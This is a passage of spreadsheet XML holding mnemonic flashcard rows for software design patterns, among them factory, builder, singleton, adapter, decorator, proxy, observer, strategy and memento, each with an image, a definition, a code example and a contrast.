          <t>Defines an overridable creation method so subclasses decide which concrete product class to instantiate.</t>
        </is>
      </c>
      <c r="F603" t="inlineStr">
        <is>
          <t>abstract Dialog { abstract createButton(); } WinDialog.createButton() -&gt; new WinButton()</t>
        </is>
      </c>
      <c r="G603" t="inlineStr">
        <is>
          <t>Abstract factory — factory method is ONE overridable method for one product; abstract factory is a whole object producing a product family.</t>
        </is>
      </c>
      <c r="H603" t="inlineStr">
        <is>
          <t>Conveyor belt stamping toys — rejected, encodes no subclass choice.</t>
        </is>
      </c>
      <c r="J603" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="K603" t="inlineStr">
        <is>
          <t>Creational patterns</t>
        </is>
      </c>
    </row>
    <row r="604">
      <c r="A604" t="n">
        <v>0</v>
      </c>
      <c r="B604" t="inlineStr">
        <is>
          <t>602</t>
        </is>
      </c>
      <c r="C604" t="inlineStr">
        <is>
          <t>Abstract factory</t>
        </is>
      </c>
      <c r="D604" t="inlineStr">
        <is>
          <t>An IKEA showroom kit: tick the 'Scandinavian' box and the crate ships a matching sofa, lamp AND table — never a gothic lamp inside a Scandi set.</t>
        </is>
      </c>
      <c r="E604" t="inlineStr">
        <is>
          <t>One interface creates a whole family of related products, keeping clients independent of which concrete family is chosen.</t>
        </is>
      </c>
      <c r="F604" t="inlineStr">
        <is>
          <t>GUIFactory { createButton(); createCheckbox(); } MacFactory yields MacButton + MacCheckbox</t>
        </is>
      </c>
      <c r="G604" t="inlineStr">
        <is>
          <t>Factory method — abstract factory bundles several factory methods to guarantee a consistent product family.</t>
        </is>
      </c>
      <c r="H604" t="inlineStr">
        <is>
          <t>Theme-park costume department — rejected, family consistency less obvious.</t>
        </is>
      </c>
      <c r="J604" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="K604" t="inlineStr">
        <is>
          <t>Creational patterns</t>
        </is>
      </c>
    </row>
    <row r="605">
      <c r="A605" t="n">
        <v>0</v>
      </c>
      <c r="B605" t="inlineStr">
        <is>
          <t>603</t>
        </is>
      </c>
      <c r="C605" t="inlineStr">
        <is>
          <t>Builder</t>
        </is>
      </c>
      <c r="D605" t="inlineStr">
        <is>
          <t>A Subway sandwich artist: bread? cheese? toasted? Each shout adds one layer, and only the final 'wrap it up!' (build) hands you the finished sub.</t>
        </is>
      </c>
      <c r="E605" t="inlineStr">
        <is>
          <t>Constructs a complex object step by step through a fluent or staged API, separating construction from the final representation.</t>
        </is>
      </c>
      <c r="F605" t="inlineStr">
        <is>
          <t>new Request.Builder().url(u).header(k,v).post(body).build() — OkHttp</t>
        </is>
      </c>
      <c r="G605" t="inlineStr">
        <is>
          <t>Factory — a factory returns the object in one call; a builder accumulates many optional parts before build().</t>
        </is>
      </c>
      <c r="H605" t="inlineStr">
        <is>
          <t>LEGO instruction booklet — rejected, misses the fluent step-by-step calls.</t>
        </is>
      </c>
      <c r="J605" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="K605" t="inlineStr">
        <is>
          <t>Creational patterns</t>
        </is>
      </c>
    </row>
    <row r="606">
      <c r="A606" t="n">
        <v>0</v>
      </c>
      <c r="B606" t="inlineStr">
        <is>
          <t>604</t>
        </is>
      </c>
      <c r="C606" t="inlineStr">
        <is>
          <t>Prototype</t>
        </is>
      </c>
      <c r="D606" t="inlineStr">
        <is>
          <t>Dolly the sheep on a photocopier: slam the lid on the prize ewe, press COPY, and an identical lamb trots warm out of the output tray.</t>
        </is>
      </c>
      <c r="E606" t="inlineStr">
        <is>
          <t>Creates new objects by cloning a pre-configured exemplar instance instead of instantiating classes from scratch.</t>
        </is>
      </c>
      <c r="F606" t="inlineStr">
        <is>
          <t>enemy = bossPrototype.clone(); enemy.hp = 50; — game spawning from templates</t>
        </is>
      </c>
      <c r="G606" t="inlineStr">
        <is>
          <t>JS prototype chain — that is property delegation at lookup time; GoF Prototype clones an exemplar at creation time.</t>
        </is>
      </c>
      <c r="H606" t="inlineStr">
        <is>
          <t>Rubber stamp — rejected, loses the 'pre-configured living exemplar' idea.</t>
        </is>
      </c>
      <c r="J606" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="K606" t="inlineStr">
        <is>
          <t>Creational patterns</t>
        </is>
      </c>
    </row>
    <row r="607">
      <c r="A607" t="n">
        <v>0</v>
      </c>
      <c r="B607" t="inlineStr">
        <is>
          <t>605</t>
        </is>
      </c>
      <c r="C607" t="inlineStr">
        <is>
          <t>Singleton</t>
        </is>
      </c>
      <c r="D607" t="inlineStr">
        <is>
          <t>Highlander in a server room beheading every extra instance with a katana — 'There can be only one!' — then standing guard at the single door, getInstance().</t>
        </is>
      </c>
      <c r="E607" t="inlineStr">
        <is>
          <t>Ensures a class has exactly one instance and provides a single global access point to it.</t>
        </is>
      </c>
      <c r="F607" t="inlineStr">
        <is>
          <t>Runtime.getRuntime() in Java always returns the same Runtime object</t>
        </is>
      </c>
      <c r="G607" t="inlineStr">
        <is>
          <t>Static utility class — a singleton is a real instance (can implement interfaces, be passed around); statics cannot be substituted.</t>
        </is>
      </c>
      <c r="H607" t="inlineStr">
        <is>
          <t>The Pope — rejected, succession implies replaceable instances.</t>
        </is>
      </c>
      <c r="J607" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="K607" t="inlineStr">
        <is>
          <t>Creational patterns</t>
        </is>
      </c>
    </row>
    <row r="608">
      <c r="A608" t="n">
        <v>0</v>
      </c>
      <c r="B608" t="inlineStr">
        <is>
          <t>606</t>
        </is>
      </c>
      <c r="C608" t="inlineStr">
        <is>
          <t>Singleton as design smell</t>
        </is>
      </c>
      <c r="D608" t="inlineStr">
        <is>
          <t>The Highlander's katana rusts: one immortal hoarding all state, and every unit test must duel him at the locked door just to reset a flag.</t>
        </is>
      </c>
      <c r="E608" t="inlineStr">
        <is>
          <t>Singletons hide dependencies, create global mutable state, and weld tests to shared instances — prefer one instance wired via DI.</t>
        </is>
      </c>
      <c r="F608" t="inlineStr">
        <is>
          <t>Config.getInstance() buried deep vs constructor(config) — the second declares its needs</t>
        </is>
      </c>
      <c r="G608" t="inlineStr">
        <is>
          <t>'One instance' vs 'global access' — a single instance is fine; the smell is the global access point that hides coupling.</t>
        </is>
      </c>
      <c r="H608" t="inlineStr">
        <is>
          <t>Town's only well poisoned for everyone — rejected, encodes shared state but not hidden dependency.</t>
        </is>
      </c>
      <c r="J608" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="K608" t="inlineStr">
        <is>
          <t>Creational patterns</t>
        </is>
      </c>
    </row>
    <row r="609">
      <c r="A609" t="n">
        <v>0</v>
      </c>
      <c r="B609" t="inlineStr">
        <is>
          <t>607</t>
        </is>
      </c>
      <c r="C609" t="inlineStr">
        <is>
          <t>Object pool</t>
        </is>
      </c>
      <c r="D609" t="inlineStr">
        <is>
          <t>Bowling alley shoe counter: nobody buys shoes — you borrow a disinfectant-sprayed pair, bowl, return them, and the next bowler laces up the same pair.</t>
        </is>
      </c>
      <c r="E609" t="inlineStr">
        <is>
          <t>Keeps expensive-to-create objects in a reusable pool; clients borrow, use, and return them instead of constructing new ones.</t>
        </is>
      </c>
      <c r="F609" t="inlineStr">
        <is>
          <t>HikariCP database connection pool; ThreadPoolExecutor worker threads</t>
        </is>
      </c>
      <c r="G609" t="inlineStr">
        <is>
          <t>Flyweight — pooled objects are borrowed exclusively then returned; flyweights are immutable and shared by everyone at once.</t>
        </is>
      </c>
      <c r="H609" t="inlineStr">
        <is>
          <t>Tool-lending library — rejected, bowling shoes are smellier and stickier.</t>
        </is>
      </c>
      <c r="J609" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="K609" t="inlineStr">
        <is>
          <t>Creational patterns</t>
        </is>
      </c>
    </row>
    <row r="610">
      <c r="A610" t="n">
        <v>0</v>
      </c>
      <c r="B610" t="inlineStr">
        <is>
          <t>608</t>
        </is>
      </c>
      <c r="C610" t="inlineStr">
        <is>
          <t>Static factory method</t>
        </is>
      </c>
      <c r="D610" t="inlineStr">
        <is>
          <t>A vending machine bolted to the class wall: press the labeled button 'valueOf' and it may hand you a chilled cached can rather than brew a new one.</t>
        </is>
      </c>
      <c r="E610" t="inlineStr">
        <is>
          <t>A named static method that returns instances, enabling caching, subtype returns, and readable names that raw constructors cannot offer.</t>
        </is>
      </c>
      <c r="F610" t="inlineStr">
        <is>
          <t>Integer.valueOf(127) returns a cached instance; List.of(1,2,3); Optional.empty()</t>
        </is>
      </c>
      <c r="G610" t="inlineStr">
        <is>
          <t>GoF Factory Method — GoF's relies on subclass polymorphism to pick the product; static factories are just well-named static creators.</t>
        </is>
      </c>
      <c r="H610" t="inlineStr">
        <is>
          <t>Named doorbells on one house — rejected, caching aspect lost.</t>
        </is>
      </c>
      <c r="J610" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="K610" t="inlineStr">
        <is>
          <t>Creational patterns</t>
        </is>
      </c>
    </row>
    <row r="611">
      <c r="A611" t="n">
        <v>0</v>
      </c>
      <c r="B611" t="inlineStr">
        <is>
          <t>609</t>
        </is>
      </c>
      <c r="C611" t="inlineStr">
        <is>
          <t>Lazy initialization</t>
        </is>
      </c>
      <c r="D611" t="inlineStr">
        <is>
          <t>A Murphy bed that stays hidden in the wall until the teenager's first yawn — then WHAM, it unfolds. Until that first yawn the room is empty and cheap.</t>
        </is>
      </c>
      <c r="E611" t="inlineStr">
        <is>
          <t>Defers costly object creation until the moment of first use, trading startup cost for a check (and locking care) on first access.</t>
        </is>
      </c>
      <c r="F611" t="inlineStr">
        <is>
          <t>if (instance == null) instance = new Heavy(); — double-checked locking when threaded</t>
        </is>
      </c>
      <c r="G611" t="inlineStr">
        <is>
          <t>Eager initialization — eager pays at load time and is trivially thread-safe; lazy pays on first access and needs synchronization.</t>
        </is>
      </c>
      <c r="H611" t="inlineStr">
        <is>
          <t>Instant noodles — rejected, encodes speed not deferral.</t>
        </is>
      </c>
      <c r="J611" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="K611" t="inlineStr">
        <is>
          <t>Creational patterns</t>
        </is>
      </c>
    </row>
    <row r="612">
      <c r="A612" t="n">
        <v>0</v>
      </c>
      <c r="B612" t="inlineStr">
        <is>
          <t>610</t>
        </is>
      </c>
      <c r="C612" t="inlineStr">
        <is>
          <t>Structural patterns</t>
        </is>
      </c>
      <c r="D612" t="inlineStr">
        <is>
          <t>Scaffolding around a cathedral: nothing new is born on site — pipes, wraps, and bridges just join existing stones into a grander shape.</t>
        </is>
      </c>
      <c r="E612" t="inlineStr">
        <is>
          <t>GoF pattern family for composing classes and objects into larger flexible structures — mostly by wrapping or nesting existing pieces.</t>
        </is>
      </c>
      <c r="F612" t="inlineStr">
        <is>
          <t>Adapter, Bridge, Composite, Decorator, Facade, Flyweight, Proxy</t>
        </is>
      </c>
      <c r="G612" t="inlineStr">
        <is>
          <t>Creational patterns — structural arrange objects that already exist; creational decide how objects come into being.</t>
        </is>
      </c>
      <c r="H612" t="inlineStr">
        <is>
          <t>Tetris pieces locking — rejected, implies destruction of rows.</t>
        </is>
      </c>
      <c r="J612" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="K612" t="inlineStr">
        <is>
          <t>Structural patterns</t>
        </is>
      </c>
    </row>
    <row r="613">
      <c r="A613" t="n">
        <v>0</v>
      </c>
      <c r="B613" t="inlineStr">
        <is>
          <t>611</t>
        </is>
      </c>
      <c r="C613" t="inlineStr">
        <is>
          <t>Adapter</t>
        </is>
      </c>
      <c r="D613" t="inlineStr">
        <is>
          <t>An EU wall plug jammed into a US socket via a chunky travel adapter cube — same electricity flowing, prongs reshaped. The cube speaks both pin languages.</t>
        </is>
      </c>
      <c r="E613" t="inlineStr">
        <is>
          <t>Wraps an object to convert its incompatible interface into the one clients expect, without changing either side.</t>
        </is>
      </c>
      <c r="F613" t="inlineStr">
        <is>
          <t>java.io.InputStreamReader adapts InputStream (bytes) to Reader (chars)</t>
        </is>
      </c>
      <c r="G613" t="inlineStr">
        <is>
          <t>Decorator — adapter CHANGES the interface; decorator keeps the same interface and adds behavior.</t>
        </is>
      </c>
      <c r="H613" t="inlineStr">
        <is>
          <t>UN interpreter booth — reserved for Interpreter pattern instead.</t>
        </is>
      </c>
      <c r="J613" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="K613" t="inlineStr">
        <is>
          <t>Structural patterns</t>
        </is>
      </c>
    </row>
    <row r="614">
      <c r="A614" t="n">
        <v>0</v>
      </c>
      <c r="B614" t="inlineStr">
        <is>
          <t>612</t>
        </is>
      </c>
      <c r="C614" t="inlineStr">
        <is>
          <t>Decorator</t>
        </is>
      </c>
      <c r="D614" t="inlineStr">
        <is>
          <t>A Christmas tree gaining lights, then tinsel, then baubles — at every layer it still answers to 'tree', just fancier each time you wrap it.</t>
        </is>
      </c>
      <c r="E614" t="inlineStr">
        <is>
          <t>Wraps an object behind the SAME interface to add responsibilities dynamically; wrappers stack in layers.</t>
        </is>
      </c>
      <c r="F614" t="inlineStr">
        <is>
          <t>new BufferedInputStream(new GZIPInputStream(new FileInputStream(f)))</t>
        </is>
      </c>
      <c r="G614" t="inlineStr">
        <is>
          <t>Proxy — decorator adds features and the client stacks it knowingly; proxy controls ACCESS and usually hides that it wraps. | cf. 328 Decorator (déjà pris): 328 is the language feature wrapping a FUNCTION; 612 the GoF pattern wrapping an OBJECT behind its own interface</t>
        </is>
      </c>
      <c r="H614" t="inlineStr">
        <is>
          <t>Onion layers — rejected, onions belong to onion architecture.</t>
        </is>
      </c>
      <c r="J614" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="K614" t="inlineStr">
        <is>
          <t>Structural patterns</t>
        </is>
      </c>
    </row>
    <row r="615">
      <c r="A615" t="n">
        <v>0</v>
      </c>
      <c r="B615" t="inlineStr">
        <is>
          <t>613</t>
        </is>
      </c>
      <c r="C615" t="inlineStr">
        <is>
          <t>Facade</t>
        </is>
      </c>
      <c r="D615" t="inlineStr">
        <is>
          <t>A hotel concierge desk: one calm smiling face; behind the wall, kitchens, laundries, and boilers roar. You just say 'dinner at eight'.</t>
        </is>
      </c>
      <c r="E615" t="inlineStr">
        <is>
          <t>Puts one simple front-door interface over a tangled subsystem so common tasks take one call instead of many.</t>
        </is>
      </c>
      <c r="F615" t="inlineStr">
        <is>
          <t>requests.get(url) hides sockets, TLS, redirects, pooling — Python requests library</t>
        </is>
      </c>
      <c r="G615" t="inlineStr">
        <is>
          <t>Adapter — facade SIMPLIFIES a whole subsystem; adapter CONVERTS one interface into another expected one.</t>
        </is>
      </c>
      <c r="H615" t="inlineStr">
        <is>
          <t>Movie-set false storefront — rejected, implies fakery rather than simplification.</t>
        </is>
      </c>
      <c r="J615" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="K615" t="inlineStr">
        <is>
          <t>Structural patterns</t>
        </is>
      </c>
    </row>
    <row r="616">
      <c r="A616" t="n">
        <v>0</v>
      </c>
      <c r="B616" t="inlineStr">
        <is>
          <t>614</t>
        </is>
      </c>
      <c r="C616" t="inlineStr">
        <is>
          <t>Proxy</t>
        </is>
      </c>
      <c r="D616" t="inlineStr">
        <is>
          <t>A celebrity's body double signs autographs at the studio gate; only vetted fans are ever walked back to the real star's trailer.</t>
        </is>
      </c>
      <c r="E616" t="inlineStr">
        <is>
          <t>A stand-in exposing the same interface as the real object while controlling access — lazy loading, caching, auth, or remoting.</t>
        </is>
      </c>
      <c r="F616" t="inlineStr">
        <is>
          <t>Hibernate lazy-loading entity proxies; RPC client stubs; nginx reverse proxy</t>
        </is>
      </c>
      <c r="G616" t="inlineStr">
        <is>
          <t>Decorator — proxy manages the real object's access and lifecycle on its own; decorator just layers on behavior the client composes.</t>
        </is>
      </c>
      <c r="H616" t="inlineStr">
        <is>
          <t>Secretary screening calls — rejected, body double nails the 'same interface' clause.</t>
        </is>
      </c>
      <c r="J616" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="K616" t="inlineStr">
        <is>
          <t>Structural patterns</t>
        </is>
      </c>
    </row>
    <row r="617">
      <c r="A617" t="n">
        <v>0</v>
      </c>
      <c r="B617" t="inlineStr">
        <is>
          <t>615</t>
        </is>
      </c>
      <c r="C617" t="inlineStr">
        <is>
          <t>Composite</t>
        </is>
      </c>
      <c r="D617" t="inlineStr">
        <is>
          <t>Russian nesting dolls that all answer paint(): tap the outermost doll and every doll nested inside paints itself too, down to the tiniest.</t>
        </is>
      </c>
      <c r="E617" t="inlineStr">
        <is>
          <t>Arranges objects into part-whole trees where leaves and containers share one interface, so clients treat both uniformly.</t>
        </is>
      </c>
      <c r="F617" t="inlineStr">
        <is>
          <t>Panel.draw() calls draw() on children — buttons and nested panels alike</t>
        </is>
      </c>
      <c r="G617" t="inlineStr">
        <is>
          <t>Decorator — decorator wraps exactly ONE child to extend it; composite holds MANY children to aggregate them.</t>
        </is>
      </c>
      <c r="H617" t="inlineStr">
        <is>
          <t>Corporate org chart — rejected, abstract and visually flat.</t>
        </is>
      </c>
      <c r="J617" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="K617" t="inlineStr">
        <is>
          <t>Structural patterns</t>
        </is>
      </c>
    </row>
    <row r="618">
      <c r="A618" t="n">
        <v>0</v>
      </c>
      <c r="B618" t="inlineStr">
        <is>
          <t>616</t>
        </is>
      </c>
      <c r="C618" t="inlineStr">
        <is>
          <t>Bridge</t>
        </is>
      </c>
      <c r="D618" t="inlineStr">
        <is>
          <t>A drawbridge between two castle towers — the Shapes tower and the Renderers tower — each growing new floors independently while the bridge carries calls across.</t>
        </is>
      </c>
      <c r="E618" t="inlineStr">
        <is>
          <t>Splits an abstraction from its implementation into two independent hierarchies joined by composition, so both vary freely.</t>
        </is>
      </c>
      <c r="F618" t="inlineStr">
        <is>
          <t>Shape(renderer): Circle/Square x OpenGL/SVG = 2+2 classes, not 4 combined ones</t>
        </is>
      </c>
      <c r="G618" t="inlineStr">
        <is>
          <t>Adapter — adapter retrofits already-incompatible code; bridge is designed up front to prevent a class-combination explosion.</t>
        </is>
      </c>
      <c r="H618" t="inlineStr">
        <is>
          <t>Electrical extension cord — rejected, no image of two growing hierarchies.</t>
        </is>
      </c>
      <c r="J618" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="K618" t="inlineStr">
        <is>
          <t>Structural patterns</t>
        </is>
      </c>
    </row>
    <row r="619">
      <c r="A619" t="n">
        <v>0</v>
      </c>
      <c r="B619" t="inlineStr">
        <is>
          <t>617</t>
        </is>
      </c>
      <c r="C619" t="inlineStr">
        <is>
          <t>Flyweight</t>
        </is>
      </c>
      <c r="D619" t="inlineStr">
        <is>
          <t>A forest of a million trees pinned to ONE cardboard oak cut-out: each pin holds only an (x,y) tag; the heavy artwork exists exactly once.</t>
        </is>
      </c>
      <c r="E619" t="inlineStr">
        <is>
          <t>Shares immutable intrinsic state among many objects, keeping variable extrinsic state outside, so huge object counts stay cheap.</t>
        </is>
      </c>
      <c r="F619" t="inlineStr">
        <is>
          <t>Java String interning pool; one glyph object per character shared across a document</t>
        </is>
      </c>
      <c r="G619" t="inlineStr">
        <is>
          <t>Object pool — flyweights are immutable and shared simultaneously; pooled objects are mutable and borrowed exclusively.</t>
        </is>
      </c>
      <c r="H619" t="inlineStr">
        <is>
          <t>Stadium wave with one shirt — rejected as incoherent.</t>
        </is>
      </c>
      <c r="J619" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="K619" t="inlineStr">
        <is>
          <t>Structural patterns</t>
        </is>
      </c>
    </row>
    <row r="620">
      <c r="A620" t="n">
        <v>0</v>
      </c>
      <c r="B620" t="inlineStr">
        <is>
          <t>618</t>
        </is>
      </c>
      <c r="C620" t="inlineStr">
        <is>
          <t>Wrapper pattern intents</t>
        </is>
      </c>
      <c r="D620" t="inlineStr">
        <is>
          <t>Four gift-wrappers at one mall kiosk: one reshapes the box, one adds ribbons, one guards it behind glass, one hides a messy pile under a single bow.</t>
        </is>
      </c>
      <c r="E620" t="inlineStr">
        <is>
          <t>Four wrappers, four intents: adapter converts the interface, decorator adds behavior, proxy controls access, facade simplifies many.</t>
        </is>
      </c>
      <c r="F620" t="inlineStr">
        <is>
          <t>All look like wrap(obj) in code — ask WHY it wraps to name the pattern</t>
        </is>
      </c>
      <c r="G620" t="inlineStr">
        <is>
          <t>All four are structurally identical wrapping — the discriminator is intent, never the code shape.</t>
        </is>
      </c>
      <c r="H620" t="inlineStr">
        <is>
          <t>Four burrito fillings — rejected, fillings do not wrap.</t>
        </is>
      </c>
      <c r="J620" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="K620" t="inlineStr">
        <is>
          <t>Structural patterns</t>
        </is>
      </c>
    </row>
    <row r="621">
      <c r="A621" t="n">
        <v>0</v>
      </c>
      <c r="B621" t="inlineStr">
        <is>
          <t>619</t>
        </is>
      </c>
      <c r="C621" t="inlineStr">
        <is>
          <t>Class vs object adapter</t>
        </is>
      </c>
      <c r="D621" t="inlineStr">
        <is>
          <t>Two translators: one was RAISED bilingual, both bloodlines inherited; the other carries a phrasebook in her handbag — composition she can swap.</t>
        </is>
      </c>
      <c r="E621" t="inlineStr">
        <is>
          <t>An adapter can inherit the adaptee (class adapter, needs multiple inheritance) or hold it by composition (object adapter, the usual way).</t>
        </is>
      </c>
      <c r="F621" t="inlineStr">
        <is>
          <t>class A extends Legacy implements Target vs class A implements Target { Legacy l; }</t>
        </is>
      </c>
      <c r="G621" t="inlineStr">
        <is>
          <t>Both are still Adapter — the split is inheritance vs composition of the adaptee, not a different pattern.</t>
        </is>
      </c>
      <c r="H621" t="inlineStr">
        <is>
          <t>Cyborg vs person with a gadget — rejected, translators fit adapters better.</t>
        </is>
      </c>
      <c r="J621" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="K621" t="inlineStr">
        <is>
          <t>Structural patterns</t>
        </is>
      </c>
    </row>
    <row r="622">
      <c r="A622" t="n">
        <v>0</v>
      </c>
      <c r="B622" t="inlineStr">
        <is>
          <t>620</t>
        </is>
      </c>
      <c r="C622" t="inlineStr">
        <is>
          <t>Behavioral patterns</t>
        </is>
      </c>
      <c r="D622" t="inlineStr">
        <is>
          <t>A theater rehearsal with fixed actors but a director endlessly redrawing WHO cues WHOM — the patterns are his laminated cueing diagrams.</t>
        </is>
      </c>
      <c r="E622" t="inlineStr">
        <is>
          <t>GoF pattern family assigning responsibilities and communication between objects — who talks to whom, when, and how loosely.</t>
        </is>
      </c>
      <c r="F622" t="inlineStr">
        <is>
          <t>Observer, Strategy, Command, State, Memento, Iterator, Visitor, Mediator...</t>
        </is>
      </c>
      <c r="G622" t="inlineStr">
        <is>
          <t>Structural patterns — structural freeze object composition; behavioral choreograph runtime interaction and algorithm choice.</t>
        </is>
      </c>
      <c r="H622" t="inlineStr">
        <is>
          <t>Ant colony signals — rejected, too diffuse to picture.</t>
        </is>
      </c>
      <c r="J622" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="K622" t="inlineStr">
        <is>
          <t>Behavioral patterns I</t>
        </is>
      </c>
    </row>
    <row r="623">
      <c r="A623" t="n">
        <v>0</v>
      </c>
      <c r="B623" t="inlineStr">
        <is>
          <t>621</t>
        </is>
      </c>
      <c r="C623" t="inlineStr">
        <is>
          <t>Observer</t>
        </is>
      </c>
      <c r="D623" t="inlineStr">
        <is>
          <t>A lighthouse blinks once and every ship's bell on the horizon rings itself — each ship had signed the lighthouse's ledger to be notified.</t>
        </is>
      </c>
      <c r="E623" t="inlineStr">
        <is>
          <t>A subject keeps a list of subscribers and notifies them automatically when its state changes — one-to-many, publisher pushes.</t>
        </is>
      </c>
      <c r="F623" t="inlineStr">
        <is>
          <t>button.addEventListener('click', fn); RxJS subject.subscribe(observer)</t>
        </is>
      </c>
      <c r="G623" t="inlineStr">
        <is>
          <t>Pub/sub — observers register directly WITH the subject; pub/sub inserts a broker so parties never know each other.</t>
        </is>
      </c>
      <c r="H623" t="inlineStr">
        <is>
          <t>Newspaper delivery — reserved for pub/sub, which has the middleman.</t>
        </is>
      </c>
      <c r="J623" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="K623" t="inlineStr">
        <is>
          <t>Behavioral patterns I</t>
        </is>
      </c>
    </row>
    <row r="624">
      <c r="A624" t="n">
        <v>0</v>
      </c>
      <c r="B624" t="inlineStr">
        <is>
          <t>622</t>
        </is>
      </c>
      <c r="C624" t="inlineStr">
        <is>
          <t>Strategy</t>
        </is>
      </c>
      <c r="D624" t="inlineStr">
        <is>
          <t>A caddie's golf bag: same golfer, same swing, but you pull driver, wedge, or putter per hole — the bag hands you an algorithm shaped like a club.</t>
        </is>
      </c>
      <c r="E624" t="inlineStr">
        <is>
          <t>Encapsulates interchangeable algorithms behind one interface so the client can pick or swap them at runtime.</t>
        </is>
      </c>
      <c r="F624" t="inlineStr">
        <is>
          <t>Collections.sort(list, comparator); compressor = new GzipStrategy()</t>
        </is>
      </c>
      <c r="G624" t="inlineStr">
        <is>
          <t>State — strategy is chosen by the CLIENT and strategies ignore each other; states switch THEMSELVES as the object transitions.</t>
        </is>
      </c>
      <c r="H624" t="inlineStr">
        <is>
          <t>Swiss army knife — rejected, one welded object, nothing injected.</t>
        </is>
      </c>
      <c r="J624" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="K624" t="inlineStr">
        <is>
          <t>Behavioral patterns I</t>
        </is>
      </c>
    </row>
    <row r="625">
      <c r="A625" t="n">
        <v>0</v>
      </c>
      <c r="B625" t="inlineStr">
        <is>
          <t>623</t>
        </is>
      </c>
      <c r="C625" t="inlineStr">
        <is>
          <t>Command</t>
        </is>
      </c>
      <c r="D625" t="inlineStr">
        <is>
          <t>A diner order spike: every shouted order becomes a paper ticket stabbed onto the spike — queueable, re-cookable, or torn up to undo.</t>
        </is>
      </c>
      <c r="E625" t="inlineStr">
        <is>
          <t>Reifies a request as an object carrying receiver plus parameters, enabling queues, logs, retries, and undo.</t>
        </is>
      </c>
      <c r="F625" t="inlineStr">
        <is>
          <t>editor.execute(new PasteCommand(clipboard)); Celery task queues</t>
        </is>
      </c>
      <c r="G625" t="inlineStr">
        <is>
          <t>Strategy — command packages ONE invocation (verb plus args) to defer or undo; strategy packages an algorithm choice with no undo semantics.</t>
        </is>
      </c>
      <c r="H625" t="inlineStr">
        <is>
          <t>Genie granting written wishes — rejected, undo is the load-bearing part.</t>
        </is>
      </c>
      <c r="J625" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="K625" t="inlineStr">
        <is>
          <t>Behavioral patterns I</t>
        </is>
      </c>
    </row>
    <row r="626">
      <c r="A626" t="n">
        <v>0</v>
      </c>
      <c r="B626" t="inlineStr">
        <is>
          <t>624</t>
        </is>
      </c>
      <c r="C626" t="inlineStr">
        <is>
          <t>State pattern</t>
        </is>
      </c>
      <c r="D626" t="inlineStr">
        <is>
          <t>A vending machine possessed by moods: the CoinInserted spirit grabs the wheel, then hands it to Dispensing. Same chassis, a new driver at every stage.</t>
        </is>
      </c>
      <c r="E626" t="inlineStr">
        <is>
          <t>An object delegates behavior to a current-state object and swaps it on transitions, replacing sprawling conditionals.</t>
        </is>
      </c>
      <c r="F626" t="inlineStr">
        <is>
          <t>TCPConnection delegates open()/close() to Closed, Listening, Established objects</t>
        </is>
      </c>
      <c r="G626" t="inlineStr">
        <is>
          <t>Strategy — identical UML, but states know their siblings and trigger their own transitions; strategies are independent and client-picked.</t>
        </is>
      </c>
      <c r="H626" t="inlineStr">
        <is>
          <t>Werewolf phases — rejected, only two states and no delegation image.</t>
        </is>
      </c>
      <c r="J626" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="K626" t="inlineStr">
        <is>
          <t>Behavioral patterns I</t>
        </is>
      </c>
    </row>
    <row r="627">
      <c r="A627" t="n">
        <v>0</v>
      </c>
      <c r="B627" t="inlineStr">
        <is>
          <t>625</t>
        </is>
      </c>
      <c r="C627" t="inlineStr">
        <is>
          <t>Memento</t>
        </is>
      </c>
      <c r="D627" t="inlineStr">
        <is>
          <t>A wax-sealed envelope of your diary page: the archivist stores it but can never read it; only YOU may crack the seal and become Tuesday-you again.</t>
        </is>
      </c>
      <c r="E627" t="inlineStr">
        <is>
          <t>Captures an object's private state in an opaque token so it can be restored later without breaking encapsulation.</t>
        </is>
      </c>
      <c r="F627" t="inlineStr">
        <is>
          <t>m = editor.save(); ...; editor.restore(m) — game save slots work this way</t>
        </is>
      </c>
      <c r="G627" t="inlineStr">
        <is>
          <t>Command undo — command replays inverse operations; memento snapshots and reinstates whole state blobs.</t>
        </is>
      </c>
      <c r="H627" t="inlineStr">
        <is>
          <t>Photograph of a room — rejected, photos are readable, mementos opaque.</t>
        </is>
      </c>
      <c r="J627" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="K627" t="inlineStr">
        <is>
          <t>Behavioral patterns I</t>
        </is>
      </c>
    </row>
    <row r="628">
      <c r="A628" t="n">
        <v>0</v>
      </c>
